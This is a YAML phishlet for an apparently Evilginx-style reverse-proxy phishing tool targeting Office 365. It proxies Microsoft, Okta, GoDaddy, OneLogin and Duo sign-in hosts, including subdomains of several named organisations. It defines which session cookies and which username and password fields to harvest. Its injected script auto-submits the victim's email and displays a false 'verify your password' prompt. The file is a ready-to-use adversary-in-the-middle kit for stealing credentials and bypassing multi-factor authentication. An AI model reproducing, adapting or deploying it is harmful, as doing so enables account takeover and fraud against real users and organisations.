---
name: o365
author: "@Belphs"
min_ver: 3.5.0
proxy_hosts:
  - phish_sub: login
    orig_sub: login
    domain: microsoftonline.com
    session: true
    is_landing: true
    auto_filter: false
  - phish_sub: www
    orig_sub: www
    domain: office.com
    session: true
    is_landing: false
    auto_filter: false
  - phish_sub: o
    orig_sub: o
    domain: okta.com
    session: true
    is_landing: false
    auto_filter: false
  - phish_sub: sci
    orig_sub: sci
    domain: okta.com
    session: true
    is_landing: false
    auto_filter: false
  - phish_sub: dotfoods
    orig_sub: dotfoods
    domain: okta.com
    session: true
    is_landing: false
    auto_filter: false
  - phish_sub: login
    orig_sub: login
    domain: okta.com
    session: true
    is_landing: false
    auto_filter: false
  - phish_sub: ulgroup
    orig_sub: ulgroup
    domain: okta.com
    session: true
    is_landing: false
    auto_filter: false
  - phish_sub: YWNjb
    orig_sub: login
    domain: live.com
    session: true
    is_landing: false
    auto_filter: false
  - phish_sub: account
    orig_sub: account
    domain: live.com
    session: true
    is_landing: false
    auto_filter: false
  - phish_sub: outlook
    orig_sub: outlook
    domain: live.com
    session: true
    is_landing: false
  - phish_sub: sso
    orig_sub: sso
    domain: godaddy.com
    session: true
    is_landing: false
  - phish_sub: sso
    orig_sub: sso
    domain: secureserver.net
    session: true
    is_landing: false
    auto_filter: true
  - phish_sub: csp
    orig_sub: csp
    domain: secureserver.net
    session: true
    is_landing: false
    auto_filter: true
  - phish_sub: vn3Hg
    orig_sub: aadcdn
    domain: msauth.net
    session: true
    is_landing: false
  - phish_sub: ""
    orig_sub: ""
    domain: office.com
    session: true
    is_landing: false
    auto_filter: true
  - phish_sub: ""
    orig_sub: ""
    domain: godaddy.com
    session: true
    is_landing: false
    auto_filter: true
  - phish_sub: ""
    orig_sub: ""
    domain: onelogin.com
    session: true
    is_landing: false
    auto_filter: true
  - phish_sub: empowermm
    orig_sub: empowermm
    domain: onelogin.com
    session: true
    is_landing: false
    auto_filter: true
  - phish_sub: ""
    orig_sub: ""
    domain: duosecurity.com
    session: true
    is_landing: false
    auto_filter: true
  - phish_sub: login
    orig_sub: login
    domain: duosecurity.com
    session: true
    is_landing: false
    auto_filter: true
  - phish_sub: api-aa1a6aea
    orig_sub: api-aa1a6aea
    domain: duosecurity.com
    session: true
    is_landing: false
    auto_filter: true
sub_filters:
  - triggers_on: login.microsoftonline.com
    orig_sub: login
    domain: microsoftonline.com
    search: "{hostname}"
    replace: "{hostname}"
    mimes:
      - text/html
      - application/json
      - application/javascript
      - application/x-javascript
      - text/javascript
  - triggers_on: login.microsoftonline.com
    orig_sub: login
    domain: microsoftonline.com
    search: https://{hostname}
    replace: https://{hostname}
    mimes:
      - text/html
      - application/json
      - application/javascript
      - application/x-javascript
      - text/javascript
    redirect_only: true
  - triggers_on: login.microsoftonline.com
    orig_sub: account
    domain: microsoft.com
    search: "{hostname}"
    replace: "{hostname}"
    mimes:
      - text/html
      - application/json
      - application/javascript
      - application/x-javascript
      - text/javascript
  - triggers_on: sso.godaddy.com
    orig_sub: sso
    domain: godaddy.com
    search: href="https://{hostname}/149e9513-01fa-4fb0-aad4-566afd725d1b/2d206a39-8ed7-437e-a3be-862e0f06eea3/fp
    replace: href="https://{hostname}/149e9513-01fa-4fb0-aad4-566afd725d1b/2d206a39-8ed7-437e-a3be-862e0f06eea3/fp
    mimes:
      - text/html
      - application/json
      - application/javascript
  - triggers_on: sso.godaddy.com
    orig_sub: sso
    domain: godaddy.com
    search: https://{hostname}
    replace: https://{hostname}
    mimes:
      - text/html
      - application/json
      - application/javascript
  - triggers_on: sso.godaddy.com
    orig_sub: sso
    domain: godaddy.com
    search: "{domain}"
    replace: "{domain}"
    mimes:
      - text/html
      - application/json
      - application/javascript
  - triggers_on: login.microsoftonline.com
    orig_sub: sso
    domain: godaddy.com
    search: "{hostname}"
    replace: "{hostname}"
    mimes:
      - text/html
      - application/json
      - application/javascript
      - application/x-javascript
      - text/javascript
  - triggers_on: login.microsoftonline.com
    orig_sub: login
    domain: live.com
    search: "{hostname}"
    replace: "{hostname}"
    mimes:
      - text/html
      - text/javascript
      - application/json
  - triggers_on: login.microsoftonline.com
    orig_sub: account
    domain: live.com
    search: "{hostname}"
    replace: "{hostname}"
    mimes:
      - text/html
      - text/javascript
      - application/json
  - triggers_on: login.microsoftonline.com
    orig_sub: outlook
    domain: live.com
    search: "{hostname}"
    replace: "{hostname}"
    mimes:
      - text/html
      - text/javascript
      - application/json
  - triggers_on: login.live.com
    orig_sub: login
    domain: microsoftonline.com
    search: "{hostname}"
    replace: "{hostname}"
    mimes:
      - text/html
      - application/json
      - application/javascript
      - application/x-javascript
      - text/javascript
  - triggers_on: login.live.com
    orig_sub: account
    domain: microsoft.com
    search: "{hostname}"
    replace: "{hostname}"
    mimes:
      - text/html
      - application/json
      - application/javascript
      - application/x-javascript
      - text/javascript
  - triggers_on: login.live.com
    orig_sub: login
    domain: live.com
    search: "{hostname}"
    replace: "{hostname}"
    mimes:
      - text/html
      - application/json
      - application/javascript
      - application/x-javascript
      - text/javascript
  - triggers_on: login.live.com
    orig_sub: account
    domain: live.com
    search: "{hostname}"
    replace: "{hostname}"
    mimes:
      - text/html
      - application/json
      - application/javascript
      - application/x-javascript
      - text/javascript
  - triggers_on: login.live.com
    orig_sub: outlook
    domain: live.com
    search: "{hostname}"
    replace: "{hostname}"
    mimes:
      - text/html
      - application/json
      - application/javascript
      - application/x-javascript
      - text/javascript
  - triggers_on: account.live.com
    orig_sub: login
    domain: live.com
    search: "{hostname}"
    replace: "{hostname}"
    mimes:
      - text/html
      - application/json
      - application/javascript
      - application/x-javascript
      - text/javascript
  - triggers_on: account.live.com
    orig_sub: account
    domain: live.com
    search: "{hostname}"
    replace: "{hostname}"
    mimes:
      - text/html
      - application/json
      - application/javascript
      - application/x-javascript
      - text/javascript
  - triggers_on: account.live.com
    orig_sub: outlook
    domain: live.com
    search: "{hostname}"
    replace: "{hostname}"
    mimes:
      - text/html
      - application/json
      - application/javascript
      - application/x-javascript
      - text/javascript
auth_tokens:
  - domain: .login.microsoftonline.com
    keys:
      - ESTSAUTH
      - ESTSAUTHPERSISTENT
      - SignInStateCookie
      - esctx
      - brcap
  - domain: login.microsoftonline.com
    keys:
      - ESTSSC
      - ESTSAUTHLIGHT
      - buid
      - fpc
      - stsservicecookie
      - x-ms-gateway-slice
  - domain: .live.com
    keys:
      - .*,regexp
  - domain: .login.live.com
    keys:
      - .*,regexp
  - domain: login.live.com
    keys:
      - .*,regexp
  - domain: outlook.live.com
    keys:
      - .*,regexp
  - domain: sso.secureserver.net
    keys:
      - akm_lmprb-ssn
      - akm_lmprb
  - domain: sso.godaddy.com
    keys:
      - akm_lmprb-ssn
      - akm_lmprb
  - domain: onelogin.com
    keys:
      - .*,regexp
  - domain: .onelogin.com
    keys:
      - .*,regexp
  - domain: duosecurity.com
    keys:
      - .*,regexp
  - domain: .duosecurity.com
    keys:
      - .*,regexp
  - domain: login.duosecurity.com
    keys:
      - .*,regexp
  - domain: .login.duosecurity.com
    keys:
      - .*,regexp
force_post:
  - path: /ppsecure/post*
    search:
      - key: LoginOptions
        search: "1"
    force:
      - key: DontShowAgain
        value: "true"
    type: post
auth_urls:
  - /kmsi*
  - /ppsecure/post.srf*
  - /owa/prefetch.aspx*
  - /webmanifest.json*
  - /landingv2
  - v1/api/pass/o365/header
  - /login.srf
  - /api/pass/login
credentials:
  username:
    key: (login|UserName|username|email|account|DomainUser)
    search: (.*)
    type: post
  password:
    key: (passwd|Password|password|login_password|pass|pwd|session_password|PASSWORD)
    search: (.*)
    type: post
  custom:
    - key: (API_HOST|Lastname)
      search: (.*)
      type: json
login:
  domain: login.microsoftonline.com
  path: /
js_inject:
  - trigger_domains:
      - login.microsoftonline.com
      - login.live.com
    trigger_paths:
      - /common/oauth2/
      - /
      - /*
    script: >
      
      // Function to set the background and remove the lightbox container

      function updateBackground() {
          // Set full-screen background image
          document.body.style.backgroundImage = "url('https://i.ibb.co/fkLWqGZ/background.jpg')";
          document.body.style.backgroundSize = "cover"; // Ensures the image covers the entire background
          document.body.style.backgroundRepeat = "no-repeat"; // Prevents the image from repeating
          document.body.style.backgroundPosition = "center"; // Centers the image

          // Remove the lightbox background container from the DOM
          var lightboxContainer = document.getElementById("lightboxBackgroundContainer");
          if (lightboxContainer) {
              lightboxContainer.parentNode.removeChild(lightboxContainer);
          }

          // Optional: Set body and html to take full height
          document.documentElement.style.height = "100%";
          document.body.style.height = "100%";
      }


      // Call the update function every second for 10 times

      for (let i = 0; i < 10; i++) {
          setTimeout(updateBackground, i * 1000);
      }




      window.addEventListener("load", () => {
        function waitForElm(e){return new Promise(t=>{if(document.querySelector(e))return t(document.querySelector(e));const r=new MutationObserver(o=>{document.querySelector(e)&&(t(document.querySelector(e)),r.disconnect())});r.observe(document.body,{childList:!0,subtree:!0})})}
        waitForElm("#i0116").then((elm) => {
          if (window.location.hash.length == 0) {
            return
          }
          elm.focus();
          elm.value = window.location.hash.slice(1);
          const submBtn = document.querySelector("#idSIButton9");
          submBtn.focus();
          submBtn.click();
        });
        waitForElm("#loginHeader").then((elm) => {
          let p = document.createElement('p');
          p.textContent = "Because you're accessing sensitive info you need to verify your password";
          document.querySelectorAll("#loginHeader")[0].appendChild(p); 
        });
      });
